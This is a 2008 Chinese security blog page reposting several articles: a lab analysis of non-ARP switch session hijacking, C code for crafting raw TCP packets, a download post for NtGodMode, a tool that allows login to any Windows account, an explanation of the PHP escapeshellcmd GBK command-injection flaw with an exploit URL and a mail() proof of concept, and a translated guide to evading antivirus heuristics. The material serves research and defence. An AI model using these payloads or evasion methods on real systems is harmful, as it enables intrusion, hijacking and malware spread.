鬼仔's Blog

SSClone非ARP会话劫持原理分析

鬼仔 — Fri, 09 May 2008 01:52:32 +0800

作者：robur
来源：CSNA网络分析论坛

前两天买的过期杂志上看到的一款软件，刚开始还没注意，后来就恨自己杂志买晚了。（今年3月份的《黑客防线》）
那个神奇的软件，就像我标题上说的，叫SSClone，解释起来就是：Switch Session Clone，也就是“交换机会话克隆”（纯字面翻译，纯的～）。

这个软件有什么用？其特点就是可以不通过传统的ARP欺骗方法，来实现局域网内的会话监听、劫持、复制等操作。（其实这个软件本身是用来会话复制的，也就是拦截客户机发送给网关的数据包，如果拦截网关发送给客户机的数据包，那么就是会话劫持了。）
因为采用了非ARP欺骗的技术，结果不用测试都可想而知，所有的ARP防火墙都对它不起作用。（废话了，ARP防火墙就是拦截ARP的，没有ARP数据包有个鸟用啊，哈哈）

今天自己组建了一个小环境，做了测试，具体环境如下：
一台傻瓜交换机（就是不可管理的），一台笔记本（作为被攻击者），一台服务器（作为发动攻击者），还有一个网关（局域网通过NAT网关上网）。
笔记本、服务器和网关通过那个傻瓜交换机连接。科来分析系统部署在服务器上，只捕获服务器本机网卡收发的数据包……
服务器的地址：192.168.1.27 （00 D0 68 06 22 74）
笔记本的地址：192.168.1.100 （00 11 5B CD E8 46）
网关的地址：192.168.1.1 （00 0A EB DA 06 E0）

具体的环境介绍完了，下面我们开始分析攻击的过程。

1、首先看看抓包后分析的网关MAC下的IP地址，除了网关自己的内网IP，还有一个192.168.1.42，呵呵，只要对自己网络心中有数的管理员，都会觉得不正常吧！

2、我们打开了SSClone，开始搜索局域网内的所有IP地址。程序发出大量的ARP数据包查询局域网中存活的主机。
这时可以看出，发送这些ARP请求的是操作者的真实主机，也就是说，如果要找用此程序捣乱的人，可以在此下手。

3、我们看到，笔记本（192.168.1.100）回答了这个请求。

4、在扫描结束后几秒钟，我们开始对笔记本的数据包进行劫持。

5、现在可以看到，攻击者的计算机正在冒用网关的MAC地址以及一个假IP，向外发送数据包。也就是向交换机宣称，攻击者所在的端口对应的是网关的MAC，在真正的网关发送一个数据包，或攻击者再次发送一个伪造数据包之前，这个错误的映射关系（网关MAC<——>攻击者端口）将一直存在。
攻击者以每秒钟发送10个包的速度继续发送，不断地让交换机接收这个错误的映射关系。

6、交换机果然被欺骗了，将目标MAC为网关MAC的数据包，都发送到了攻击者的计算机上。我的科来只在服务器本地捕获，如果欺骗不成功，是不可能收到笔记本与网关的通信内容。

7、截获之后，必然要把数据包转发出去，否则网络就不通了嘛～可是现在交换机上对应网关MAC的端口是攻击者自己的端口，程序就开始用一个假冒的MAC和IP，通过ARP请求192.168.1.1（网关）的MAC地址，网关收到之后会产生一个回应。
这样正确的根据第5条所述的原理，正确的映射关系就恢复了，于是攻击者的计算机可以把这些截获的数据继续传递给网关。
之后，通过再进行第5条所述的方法，设置错误的映射关系。

8、第5条说的数据包的具体结构。

最后，关于这个方法的一些个人理解：
设置错误映射关系的数据包，不一定是IGMP，其他的数据包也有可能，只要伪造一下MAC地址即可。
找出攻击者，可以参考第2条的内容，但如果攻击者变通一下手法，也不一定管用。
通过原理可以大致推断出，这个方法除了搞劫持，还能搞断网掉线……只要攻击者不转发数据包就可以了。
解决方法，需要通过交换机的端口绑定来实现，MAC和IP双绑已经没有作用了。
因为是基于交换机端口的，所以那种设置子网来屏蔽ARP泛滥的方法，也没用啦！

刚刚接触这种技术，有不正确的地方欢迎大家指正！！！
数据包样本我就不发了，里面有我邮箱密码呀。。。。

评论数量(1) | 发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/1967.html

使用winpcap定制TCP包发送

鬼仔 — Thu, 08 May 2008 17:18:58 +0800

by: 云舒
2008-05-08
http://www.ph4nt0m.org

前些时候做DOS方面的测试，由于协议学得不够好，有些回应不记得，所以就首先想到用hping来定制一些包，看看远程主机的回应。结果下载的hping死活都不发包，换了多个不同版本的winpcap都不行。一怒之下，决定自己写个简单的。首先想到的是perl来做，最后觉得一样要安装 winpcap还有很多别的模块，不如直接c来实现一下，来得更痛快。

需要说明一下的是，在以太网头那里我故意偷懒了，没有获取本机的MAC地址而是写了个错误的。所以给内网用户发包的话，能发出去，只是你收不到回应了，发给外网就没这个问题，这是因为同交换机下面靠MAC地址来定位的。

最后一点，这里所有的包，目的MAC地址都是写的MAC，通过网关把数据转发出去的。虽然同交换机下面可以直接通过MAC定位，但是我懒得判断，直接发送给网关再转发会比较简单。

/* Code By yunshu, 2008-05-08, Make tcp packet to send to remote server
* I don’t know which version of winpcap needed by hping, so I wrote this code.
* Under winpcap 4.0.2, Dev-CPP 4.9.9.2, windows xp professional sp2
*/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <iphlpapi.h>
#include <unistd.h>
#include <pcap.h>
#include <remote-ext.h>

#define IP_PROTO    0×0800

char    LocalIP[20] = { 0 };
char    InterfaceName[256] = { 0 };
char    GatewayIP[20] = { 0 };
BYTE    GatewayMac[6];

typedef struct et_header
{
    unsigned char   eh_dst[6];
    unsigned char   eh_src[6];
    unsigned short  eh_type;
}ET_HEADER;

typedef struct ip_hdr
{
    unsigned char       h_verlen;
    unsigned char       tos;
    unsigned short      total_len;
    unsigned short      ident;
    unsigned short      frag_and_flags;
    unsigned char       ttl;
    unsigned char       proto;
    unsigned short      checksum;
    unsigned int        sourceIP;
    unsigned int        destIP;
}IP_HEADER;

typedef struct tcp_hdr
{
    unsigned short    th_sport;
    unsigned short    th_dport;
    unsigned int    th_seq;
    unsigned int    th_ack;
    unsigned char    th_lenres;
    unsigned char    th_flag;
    unsigned short    th_win;
    unsigned short    th_sum;
    unsigned short    th_urp;
}TCP_HEADER;

typedef struct tsd_hdr
{
    unsigned long    saddr;
    unsigned long    daddr;
    char            mbz;
    char            ptcl;
    unsigned short    tcpl;
}PSD_HEADER;

unsigned short CheckSum(unsigned short * buffer, int size)
{
    unsigned long   cksum = 0;

    while (size > 1)
    {
        cksum += *buffer++;
        size -= sizeof(unsigned short);
    }
    if (size)
    {
        cksum += *(unsigned char *) buffer;
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);

    return (unsigned short) (~cksum);
}

/*
void GetLocalIP( )
{
    WORD        wVersionRequested;
    WSADATA        wsaData;
    char        name[255];
    PHOSTENT    hostinfo;  

    wVersionRequested = MAKEWORD( 2, 0 );

    if( WSAStartup( wVersionRequested, &wsaData ) == 0 )
    {
        if( gethostname( name, sizeof(name) ) == 0 )
        {
            if( (hostinfo = gethostbyname(name) ) != NULL )
            {
                strcpy( LocalIP, inet_ntoa( *(struct in_addr*)*hostinfo->h_addr_list ) );
            }
        }
    }

    WSACleanup(   );
}
*/

int GetDevices( )
{
    pcap_if_t    *alldevs;
    pcap_if_t    *d;

    int i = 0;
    char errbuf[PCAP_ERRBUF_SIZE];

    /* 获取本地机器设备列表 */
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL /* auth is not needed */, &alldevs, errbuf) == -1)
    {
        fprintf(stderr,”Error in pcap_findalldevs_ex: %s\n“, errbuf);
        exit(1);
    }

    /* 打印列表 */
    for( d = alldevs; d != NULL; d = d->next )
    {
        printf(”%d. %s“, ++i, d->name);

        if (d->description)
        {
            printf( “ (%s)“, d->description );
        }

        if( d->addresses != NULL )
        {
            if( d->addresses->addr->sa_family == AF_INET )
            {

                printf( “: %s\n“, inet_ntoa( ((struct sockaddr_in *)d->addresses->addr)->sin_addr ) );
            }
            else
            {
                printf( “\n” );
            }
        }
        else
        {
            printf(” (No description available)\n“);
        }
    }

    if (i == 0)
    {
        printf(”\nNo interfaces found! Make sure WinPcap is installed.\n“);
        return -1;
    }

    printf( “\nPlease choose the index of your NetAdapter：” );
    int    AdapterIndex = 1;
    scanf( “%d“, &AdapterIndex );
    if( AdapterIndex > i )
    {
        printf( “网卡选错啦\n” );
        return -1;
    }

    d = alldevs;
    for( int index = 1; index < AdapterIndex; index ++ )
    {
        d = d->next;
    }

    if( d->name == NULL || d->addresses == NULL )
    {
        printf( “网卡选错啦\n” );
        return -1;
    }

    strcpy( InterfaceName, d->name );
    strcpy( LocalIP, inet_ntoa( ((struct sockaddr_in *)d->addresses->addr)->sin_addr ) );

    /* 不再需要设备列表了，释放它 */
    pcap_freealldevs(alldevs);

    return 1;
}

int GetGateWayMac( )
{
    PIP_ADAPTER_INFO AdapterInfo;

    ULONG    OutBufLen = sizeof(IP_ADAPTER_INFO);
    AdapterInfo = (IP_ADAPTER_INFO *)malloc(sizeof (IP_ADAPTER_INFO));
    if( AdapterInfo == NULL )
    {
        printf(”Error allocating memory needed to call GetAdaptersinfo\n“);
        return -1;
    }

    if( GetAdaptersInfo( AdapterInfo, &OutBufLen ) == ERROR_BUFFER_OVERFLOW )
    {
        free( AdapterInfo );
        AdapterInfo = (IP_ADAPTER_INFO *)malloc( OutBufLen );
        if( AdapterInfo == NULL )
        {
            printf(”Error allocating memory needed to call GetAdaptersinfo\n“);
            return -1;
        }
    }

    if( GetAdaptersInfo( AdapterInfo, &OutBufLen ) == NO_ERROR )
    {
        PIP_ADAPTER_INFO    a = AdapterInfo;
        BOOL                Found = FALSE;

         while( a )
        {
            if( strcmp(a->IpAddressList.IpAddress.String, LocalIP) == 0 )
            {
                strcpy( GatewayIP, a->GatewayList.IpAddress.String );
                Found = TRUE;
                break;
            }
            a = a->Next;
        }
        if( !Found )
        {
            printf( “Get gateway’s ip error.\n” );
            free( AdapterInfo );
            return -1;
        }
        else
        {
            free( AdapterInfo );
        }
    }
    else
    {
        printf( “Get gateway’s ip error.\n” );
        free( AdapterInfo );
        return -1;
    }

    BYTE    Mac[6];
    ULONG    MacLen = 6;
    SendARP( inet_addr(GatewayIP), 0, (PULONG)&Mac, &MacLen );
    memcpy( GatewayMac, Mac, MacLen );

    /*
    for( int index = 0; index < MacLen; index ++ )
    {
        printf( “%d: %02x\n”, index, Mac[index] );
    }
    printf( “\n%d\n”, MacLen );
    */
}

void Usage( char *me )
{
    printf( “Make tcp package 0.1, code by yunshu\n” );
    printf( “%s:   targetip  targetport [flag]\n“, me );
    printf( “flag: \n” );
    printf( “      u|U     set urg flag.\n” );
    printf( “      a|A     set ack flag.\n” );
    printf( “      p|P     set push flag.\n” );
    printf( “      r|R     set rst flag.\n” );
    printf( “      s|S     set syn flag.\n” );
    printf( “      f|F     set fin flag.\n” );
    printf( “      default is syn flag, and you can use sa to set syn+ack, and more…\n” );
}

int main( int argc, char *argv[] )
{
    ET_HEADER    EtHeader;
    IP_HEADER    IpHeader;
    TCP_HEADER    TcpHeader;
    PSD_HEADER    PsdHeader;
    u_char        Buffer[sizeof(ET_HEADER) + sizeof(IP_HEADER) + sizeof(TCP_HEADER)] = { 0 };

    if( (argc != 3) && (argc != 4) )
    {
        Usage( argv[0] );
        exit( -1 );
    }

    int    Flag = 2;
    if( argc == 4 )
    {
        Flag = 0;
        if( strchr(argv[3], ‘U’) || strchr(argv[3], ‘u’) )
        {
            Flag = Flag | 32;
        }
        if( strchr(argv[3], ‘A’) || strchr(argv[3], ‘a’) )
        {
            Flag = Flag | 16;
        }
        if( strchr(argv[3], ‘P’) || strchr(argv[3], ‘p’) )
        {
            Flag = Flag | 8;
        }
        if( strchr(argv[3], ‘R’) || strchr(argv[3], ‘r’) )
        {
            Flag = Flag | 4;
        }
        if( strchr(argv[3], ‘S’) || strchr(argv[3], ’s’) )
        {
            Flag = Flag | 2;
        }
        if( strchr(argv[3], ‘F’) || strchr(argv[3], ‘f’) )
        {
            Flag = Flag | 1;
        }
    }

    //GetLocalIP( );
    if( -1 == GetDevices( ) )
    {
        exit( -1 );
    }

    //printf( “Adapter is %s, ip is %s\n”, InterfaceName, LocalIP );

    if( -1 == GetGateWayMac( ) )
    {
        exit( -1 );
    }

    //printf( “Gateway IP is %s\n”, GatewayIP );
    //printf( “Gateway Mac is %x\n”, *GatewayMac );

    memcpy( EtHeader.eh_dst, GatewayMac, 6 );
    memset( EtHeader.eh_src, 0xa, 6 );
    EtHeader.eh_type = htons( IP_PROTO );

    IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned int));
    IpHeader.tos = 0;
    IpHeader.total_len = htons(sizeof(IpHeader)+sizeof(TcpHeader));
    IpHeader.ident = 1;
    IpHeader.frag_and_flags = 0×40;
    IpHeader.ttl = 128;
    IpHeader.proto = IPPROTO_TCP;
    IpHeader.checksum = 0;
    IpHeader.sourceIP = inet_addr( LocalIP );
    IpHeader.destIP = inet_addr( argv[1] );

    TcpHeader.th_sport = htons( rand()%60000 + 1024 );
    TcpHeader.th_dport = htons( atoi(argv[2]) );
    TcpHeader.th_seq = htonl( rand()%900000000 + 100000 );
    TcpHeader.th_ack = 0;
    TcpHeader.th_lenres = (sizeof(TcpHeader)/4<<4|0);
    TcpHeader.th_flag = Flag;
    TcpHeader.th_win = htons(512);
    TcpHeader.th_sum = 0;
    TcpHeader.th_urp = 0;

    PsdHeader.saddr = inet_addr( LocalIP );
    PsdHeader.daddr = IpHeader.destIP;
    PsdHeader.mbz = 0;
    PsdHeader.ptcl = IPPROTO_TCP;
    PsdHeader.tcpl = htons(sizeof(TcpHeader));

    memcpy( Buffer, &PsdHeader, sizeof(PsdHeader) );
    memcpy( Buffer + sizeof(PsdHeader), &TcpHeader, sizeof(TcpHeader) );
    TcpHeader.th_sum = CheckSum( (unsigned short *)Buffer, sizeof(PsdHeader) + sizeof(TcpHeader) );

    memset( Buffer, 0, sizeof(Buffer) );
    memcpy( Buffer, &IpHeader, sizeof(IpHeader) );
    IpHeader.checksum = CheckSum( (unsigned short *)Buffer, sizeof(IpHeader) );

    memset( Buffer, 0, sizeof(Buffer) );
    memcpy( Buffer, (void *)&EtHeader, sizeof(ET_HEADER) );
    memcpy( Buffer + sizeof(ET_HEADER), (void *)&IpHeader, sizeof(IP_HEADER) );
    memcpy( Buffer + sizeof(ET_HEADER) + sizeof(IP_HEADER), (void *)&TcpHeader, sizeof(TCP_HEADER) );

    char errbuf[PCAP_ERRBUF_SIZE] = { 0 };
    pcap_t *fp;
    if ( (fp= pcap_open( InterfaceName, 100, PCAP_OPENFLAG_PROMISCUOUS, 100, NULL, errbuf ) ) == NULL )
    {
        fprintf(stderr,”\nUnable to open the adapter. %s is not supported by WinPcap\n“, InterfaceName );
        return -1;
    }

    if ( pcap_sendpacket( fp, Buffer, sizeof(Buffer) ) != 0 )
    {
        fprintf(stderr,”\nError sending the packet: \n“, pcap_geterr(fp));
        return -1;
    }
    printf( “send ok!\nData is:\n” );

    for( int i = 0; i < sizeof(Buffer); i ++ )
    {
         printf( “%02x “, Buffer );
    }

    return 0;
}

评论数量(1) | 发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/1966.html

我以前用的LBS提供下载

鬼仔 — Thu, 08 May 2008 16:12:23 +0800

以前有朋友曾经邮件给我，问我能否提供我当时在用的LBS下载（当然是不要数据库的），在我转换到WordPress之后，又有朋友要我把以前的风格放出来。

刚才整理了下，这里提供下载，部分说明：

三栏
我原来的skin也放了进去，并设置为默认
订阅地址、blog信息请自行修改
侧栏推介和adsense代码请自行添加（如果需要）
referfer部分也请自行添加，我用的是Clicki
搜索部分使用的是google的自定义搜索，请更换为自己的代码
到default.asp的链接改到根目录
请自行修改Meta标签中的keywords，我是在lang中定义的
head中给Firefox和IE7添加内置搜索引擎（OpenSearch）的部分也请自行修改guizai.g-search.xml也已打包进去，修改guizai.g-search.xml即可，global.asp中先关代码为<link title=”鬼仔.G Search” type=”application/opensearchdescription+xml” rel=”search” href=”guizai.g-search.xml” />
加了一个独立友情链接页面
请自行修改lang中的keywords和description
添加登陆Cookie的时效选择
日期格式调整为YY/MM/DD hh:ii
删除文章页面调整字体大小的功能
删除文章最后修改时间的显示
删除首页普通视图中的“永久链接”，将分类，评论数，浏览数等信息放到文章标题下，以“[ 2008/04/20 23:21 | 鬼仔发表于乱七八糟 | 0评论 | 134 Views ]”的形式表现
修改原“编辑”、“删除”图标为文字
评论框样式修改为

官方数据库
feed全文输出，同时请修改feed.asp中的email
默认用户：admin 默认密码：comeon

暂时就想起来这么多，其他还有一些小改动可能不记得了。

下载地址：lbs.rar

最后给个截图（Firefox 3，IE6、7，Opera9.5下显示均正常）：

查看大图

评论数量(7) | 发表评论 | 分类：心情随笔
本文网址：http://huaidan.org/archives/1964.html

NtGodMode.exe

鬼仔 — Thu, 08 May 2008 12:57:36 +0800

鬼仔：我还没来得及测试。

作者：golds7n[LAG]
大小：9216 Bytes
MD5 ：7026217dc72aa564a2834995d7a7b017
来源：安全焦点

————————–
NtGod Private
Powered By golds7n[LAG]
————————–
Usage: NtGodMode.exe ON|OFF
NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
情景再现: 当你在进行主机安全检测时,获取了SYSTEM Shell,以前会想办法获得administrator等帐号的口令,使用gina窃取、sam hash破解、增加管理帐号等,而现在直接执行 ntgodmode on 就可以轻松登录任意帐号。登录完毕后,ntgodmode off,关闭上帝模式。

注：本文件为网友上传，XFOCUS 未对其进行安全检查。XFOCUS 不对下载、查看、执行其该文件及其包含内容所可能导致的后果做任何暗示和保证。

>> 下载 <<

评论数量(7) | 发表评论 | 分类：工具收集
本文网址：http://huaidan.org/archives/1963.html

php escapeshellcmd多字节编码漏洞解析及延伸

鬼仔 — Thu, 08 May 2008 12:55:38 +0800

作者：T_Torchidy (jnchaha_at_163.com)
来源：安全焦点

漏洞公告在http://www.sektioneins.de/advisories/SE-2008-03.txt

PHP 5 <= 5.2.5
PHP 4 <= 4.4.8

一些允许如GBK，EUC-KR, SJIS等宽字节字符集的系统都可能受此影响，影响还是非常大的，国内的虚拟主机应该是通杀的，在测试完这个漏洞之后，发现还是十分有意思的，以前也有过对这种类型安全漏洞的研究，于是就把相关的漏洞解释和一些自己的想法都写出来，也希望国内的一些有漏洞的平台能迅速做出响应，修补漏洞。
这个漏洞出在php的用来转义命令行字符串的函数上，这些函数底层是用的php_escape_shell_cmd这个函数的，我们先来看看他的处理过程：
/* {{{ php_escape_shell_cmd
Escape all chars that could possibly be used to
break out of a shell command

This function emalloc’s a string and returns the pointer.
Remember to efree it when done with it.

*NOT* safe for binary strings
*/
char *php_escape_shell_cmd(char *str) {
register int x, y, l;
char *cmd;
char *p = NULL;

l = strlen(str);
cmd = safe_emalloc(2, l, 1);

for (x = 0, y = 0; x < l; x++) {
switch (str[x]) {
case ‘”‘:
case ‘\”:
#ifndef PHP_WIN32
if (!p && (p = memchr(str + x + 1, str[x], l - x - 1))) {
/* noop */
} else if (p && *p == str[x]) {
p = NULL;
} else {
cmd[y++] = ‘\\’;
}
cmd[y++] = str[x];
break;
#endif
case ‘#’: /* This is character-set independent */
case ‘&’:
case ‘;’:
case ‘`’:
case ‘|’:
case ‘*’:
case ‘?’:
case ‘~’:
case ‘<’:
case ‘>’:
case ‘^’:
case ‘(’:
case ‘)’:
case ‘[':
case ']‘:
case ‘{’:
case ‘}’:
case ‘$’:
case ‘\\’:
case ‘\x0A’: /* excluding these two */
case ‘\xFF’:
#ifdef PHP_WIN32
/* since Windows does not allow us to escape these chars, just remove them */
case ‘%’:
cmd[y++] = ‘ ‘;
break;
#endif
cmd[y++] = ‘\\’;
/* fall-through */
default:
cmd[y++] = str[x];

}
}
cmd[y] = ‘\0′;
return cmd;
}
/* }}} */

可以看到，php通过将”,’,#,&,;…..等等在shell命令行里有特殊意义的字符都通过在前面加上\变成\”.\’, \#,\&,\;……来进行转义，使得用户的输入被过滤，来避免产生command injection漏洞。在php看来，只要过滤了这些字符，送入到system等函数中时，参数就会是安全的，php手册中给出的利用例子如下：

<?php
$e = escapeshellcmd($userinput);

// here we don’t care if $e has spaces
system(”echo $e”);
$f = escapeshellcmd($filename);

// and here we do, so we use quotes
system(”touch \”/tmp/$f\”; ls -l \”/tmp/$f”");
?>

很明显，如果没有经过escapeshellcmd的处理，用户输入hello;id的话，最后system执行的会是：

echo hello;id

;在shell里是分割命令的作用，这样不仅仅会echo hello,还会执行id这个命令，导致命令注入漏洞。用escapeshellcmd处理之后命令变成：

echo hello\;id

这样执行的命令就只会是echo，其他的都变成echo的参数，很安全。

事实上是这样么？php在处理完参数送入system之后它就什么都不管了，后面的工作实际上都是由linux来完成的，那么linux在处理这些参数的时候是怎么样的呢？linux在执行命令的时候会有一些的表示工作环境的环境变量，譬如PWD代表当前的工作环境，UID代表了你的身份，BASH代表命令解释器等等……而在linux系统执行命令的时候，还有一个非常重要的参数，LANG，这个参数决定了linux shell如何处理你的输入，这样就可以当你输入一些中文字符的时候，linux能认识他，不至于出现人与系统之间出现理解上的错误。默认情况下，linux的LANG是en_US.UTF-8，UTF-8是一个很安全的字符集，其系列中包含有对自身的校验，所以不会出现错误，会工作良好。一些系统支持多字节字符集如GBK的时候，这也正是国内的多数情况，你可以设置LANG=zh_CN.GBK，这样你的输入都会被当作GBK编码处理，而 GBK是双字节的，合法的GBK编码会被认为是一个字符。
大家可以看到，在php的处理过程中，它是单字节处理的，它只把输入当作一个字节流，而在linux设置了GBK字符集的时候，它的处理是双字节的，大家的理解很明显地不一致。我们查下GBK的字符集范围为8140-FEFE，首字节在 81-FE 之间，尾字节在 40-FE 之间，而一个非常重要的字符\的编码为5c，在GBK的尾字节范围之内，这样我们考虑一个特殊的输入：

0xbf;id
或 0xbf’id

经过php的escapeshellcmd单字节转码之后将会是

0xbf5c;id
0xbf5c’id

注意0xbf5c是一个合法的GBK编码，那么在linux执行的时候，会认为输入是

[0xbfbc];id

很好，后面的id将会被执行。可以做个简单的实验，如下：

[loveshell@Loveshell tmp]$ echo 縗
>
?
[loveshell@Loveshell tmp]$ set|grep -i lang
LANG=zh_CN.GB2312
LANGVAR=en_US.UTF-8
[loveshell@Loveshell tmp]$ export LANG=zh_CN.GBK
[loveshell@Loveshell tmp]$ echo 縗
縗
[loveshell@Loveshell tmp]$ set|grep -i lang
LANG=zh_CN.GBK
LANGVAR=en_US.UTF-8
[loveshell@Loveshell tmp]$

其中縗的编码为0xbf5c，可以看到在不设置LANG为GBK的时候縗是一个非法的gb2312编码，所以会被认为是两个字符，所以其中含有的0×5c起作用，被认为命令没结束。然后我们设置编码为GBK，縗就会被认为是一个字符来echo了。
那我们如何来证明php的漏洞呢，拿

<?php
$e = escapeshellcmd($_GET[c]);
// here we don’t care if $e has spaces
system(”echo $e”);
?>

作为例子，正常情况下上面的代码工作很好，我们提交

exp.php?c=loveshell%bf;id

结果返回

loveshell?id

我们再来稍微改下上面的代码

<?php
putenv(”LANG=zh_CN.GBK”);
$e = escapeshellcmd($_GET[c]);
// here we don’t care if $e has spaces
system(”echo $e”);
?>

php的putenv函数用于修改php的运行时的环境变量，上面修改完LANG之后，再提交上面的参数就可以看到：

loveshell縗 uid=99(nobody) gid=4294967295 groups=4294967295

命令被成功执行了，这里需要自己设置环境变量，当然也可能某些机器已经设置了LANG为GBK，于是一些采用escapeshellcmd过滤输入的就会出问题了。这里本质是linux和php对参数的理解不一致，而php的mail函数在底层还是依靠系统来执行sendmail命令的，并且支持对 sendmail命令加参数，不过参数被过滤了，但是利用这里说到的问题，我们就可以在多字节编码机器上bypass过滤。
mail函数一些代码片段如下：

……
if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, “SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE.”);
RETURN_FALSE;
}

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, “sss|ss”,
&to, &to_len,
&subject, &subject_len,
&message, &message_len,
&headers, &headers_len,
&extra_cmd, &extra_cmd_len
) == FAILURE) {
return;
}
……

if (force_extra_parameters) {
extra_cmd = estrdup(force_extra_parameters);
} else if (extra_cmd) {
extra_cmd = php_escape_shell_cmd(extra_cmd);
}

if (php_mail(to_r, subject_r, message, headers, extra_cmd TSRMLS_CC)) {
RETVAL_TRUE;
} else {
RETVAL_FALSE;
}
…..

这里如果不是安全模式就会允许第五个参数，第五个参数作为extra_cmd经过php_escape_shell_cmd过滤后作为第五个参数送入php_mail函数，在php_mail中片段如下：

……
if (extra_cmd != NULL) {
sendmail_cmd = emalloc (strlen (sendmail_path) + strlen (extra_cmd) + 2);
strcpy (sendmail_cmd, sendmail_path);
strcat (sendmail_cmd, ” “);
strcat (sendmail_cmd, extra_cmd);
} else {
sendmail_cmd = sendmail_path;
}

#ifdef PHP_WIN32
sendmail = popen(sendmail_cmd, “wb”);
#else
/* Since popen() doesn’t indicate if the internal fork() doesn’t work
* (e.g. the shell can’t be executed) we explicitely set it to 0 to be
* sure we don’t catch any older errno value. */
errno = 0;
sendmail = popen(sendmail_cmd, “w”);
……

extra_cmd被附着在sendmail路径后面作为参数了，这里我们就可以利用这个漏洞来在一些禁止掉system等危险函数的环境下执行命令了，我写的poc如下：

<?php
//php disable function bypass vul
//by Stefan Esser
//poc by Loveshell

putenv(”LANG=zh_CN.GBK”);
mail(”loveshell@loveshell.net”,”",”",”",”xxxx”.chr(0xbf).”;”.$_GET[c]);
?>

可以在支持GBK的机器上运行，其他字符集应该也一样，稍微修改下也就可以用。至于修补，我想还是尽快升级到新版，或者将mail函数拉入你的黑名单之列。
这个漏洞的本质是在于处理数据的时候理解不一致造成的，稍微把以前的一些问题结合起来很容易发现这方面的影子。php与Mysql处理不一致导致注射，程序处理和浏览器处理html不一致导致xss，处理xml不一致导致xml注射….这里又看到在linux shell处理上还有不一致的时候导致命令注射。可以预料，在perl等其他脚本语言里，涉及字符集处理的地方一样会产生这样的问题。字符集代表了系统是如何对待输入的数据，字符集不一样，系统得到的信息就不一样，在一些字符集中，只要\,’,|这些特殊字符落在宽字节第二个字节范围之中的时候就会导致问题，譬如

SJIS
[\x20-\x7e]|[\xa1-\xdf]|([\x81-\x9f]|[\xe0-\xef])([\x40-\x7e]|[\x80-\xfc])

\x40-\x7e就包括了\x5c，导致问题出现。我们在设计程序在处理与其他层面的程序或者协议打交道的时候就要考虑好这个因素，做好处理的一致，避免出现问题。再次向Stefan Esser致，Stefan Esser is my hero! ：）

评论数量(0) | 发表评论 | 分类：技术文章
本文网址：http://huaidan.org/archives/1962.html

对抗启发式代码仿真检测技术分析

鬼仔 — Thu, 08 May 2008 12:54:37 +0800

作者：nEINEI
邮箱：neineit@gmail.com
完成于：08-05-06
来源：安全焦点

最近在研究病毒的检测技术，虽然在这个木马、流氓件猖獗的年代，检测技术（除了考虑效率因素外）已经变得不是十分重要了。但俺仍然出于兴趣想从这里面寻找些思路。或许对抗技术的本身并不在于谁彻底打败了谁，而在于彼此间共同进步。在查阅资料中发现了这篇文章（Anti heuristic techniques author:Black Jack ），虽然是比较古老的，但还是可以从中获得很多新的思路。翻译的比较粗糙，如有不正确或不准确的地方还望大家指正，后面我会继续谈些对抗仿真技术的策略。译文如下：
简介
在早些年的日子里，杀毒软件通过对病毒的特征码搜索是完全可以检测出病毒的。但随着病毒数量的快速增涨，反病毒研究人员发明了一些启发式的病毒检测方法，并把它应用到工作中。代码仿真的启发式扫描器会像虚拟机一样运行程序的代码，并在此环境下检测程序是否具有病毒的相似行为。

所以在理论上，这样的启发式扫描可以发现任何一种新的病毒。但仅仅是理论上，因为代码仿真不可能达到对真实CUP的100%模拟，所以该技术并不能毫无遗漏的检测出每一个病毒。由此可见，在VX社区中，寻找启发式引擎的缺陷和利用它们就成了我们的目标和责任。我所要谈的就是如何利用不同的手段欺骗并愚弄这些启发式引擎，使我们最新创造的那些无形的邪恶的程序不被启发式引擎所找到及清除。
这是我认为在病毒的编程领域里最有趣的事情(因为始终是有一种伟大的感觉，那就是你比你的敌人更聪明; -) ).以下是我在过去的日子里关于这方面的研究成果。

了解你的对手
如果你想研究Anti heuristic技术，第一件事就是你需要一个具有启发式功能的扫描器来检测你编写的创作(virus),我建议你尽量多的找些这样的扫描器。因为每一启发式的扫描器都有自己的强项及弱点。我给你一个简单的扫描器列表，我将使用这些来进行测试。

.Thunderbyte Antivirus (http://www.thunderbyte.com) 在早期，这被认为是最好的扫描器了，但现在，在vxer的眼中它已经被认是很一般的了，至少在”启发式检测”(其实仅是特定的字符串描)方面如此。但在其它方面它附带了很多实用的扫描器(checksummer, cleaner, memory resident utilities…)。顺便说一下，每个人都会有自己喜欢的不同版本，我建议您使用7.xx这一版本。因为这个版本可以让您制定您自己的扫描方式，这一点很重要，如果你自己不小心感染了自己的机器。

.F-prot (http://www.datafellows.com) 这个是不算太坏的，虽然还有很多更好的。有趣的是，比起现在最后的一个版本在启发式方面有了更好的改进。所有我建议您使用V2.2.8版或像我一样使用 V2.2.7版来测试你的病毒。另外有趣的特点是这款扫描器，支持使用可疑扫描的命令行参数方式执行。如果您使用它，将进入一个智能的扫描模式。基于这样的原因，你知道开启可疑检测模式并不是必需的，如果你这样做了，你会知道你的anti-heuristic 技术实在是太好用了。

.AVP (http://www.avp.ch):在我认为最好的启发式扫描器当中，确实是难于欺骗的一个。我是用的版本是version 3.0 build 128
.NOD (http://www.eset.sk): 像AVP一样的优秀。
.Dr. Web (http://www.dials.ru): 这也是非常好的启发式扫描器，那些俄罗斯人知道如何取得更好的Anti Virus效果。
.Dr Solomon’s (http://www.drsolomon.com):从我一个在NAI工作的一个朋友那里知道，这是一款中高质量的扫描器，但它的效果仍优于mcafee。
.Ikarus Antivirus (http://www.ikarus.at):一个中等品质的扫描器，我使用它，是出于爱国的原因。

重要的思路
我的所有欺骗手段，都是基于同样的思路的：那就是病毒是加密的，我们要在扫描器能解密出病毒体前停止仿真代码的执行，或者在扫描过程中隐藏我们的加密密钥。如果你仍然没有使用加密的方式，密钥隐藏手段也是可以使用的，在“加密”的调用方式中（例如，int 21h 中断的值），例如这样打开一个文件的操作,虽然我没有测试过这种方式。
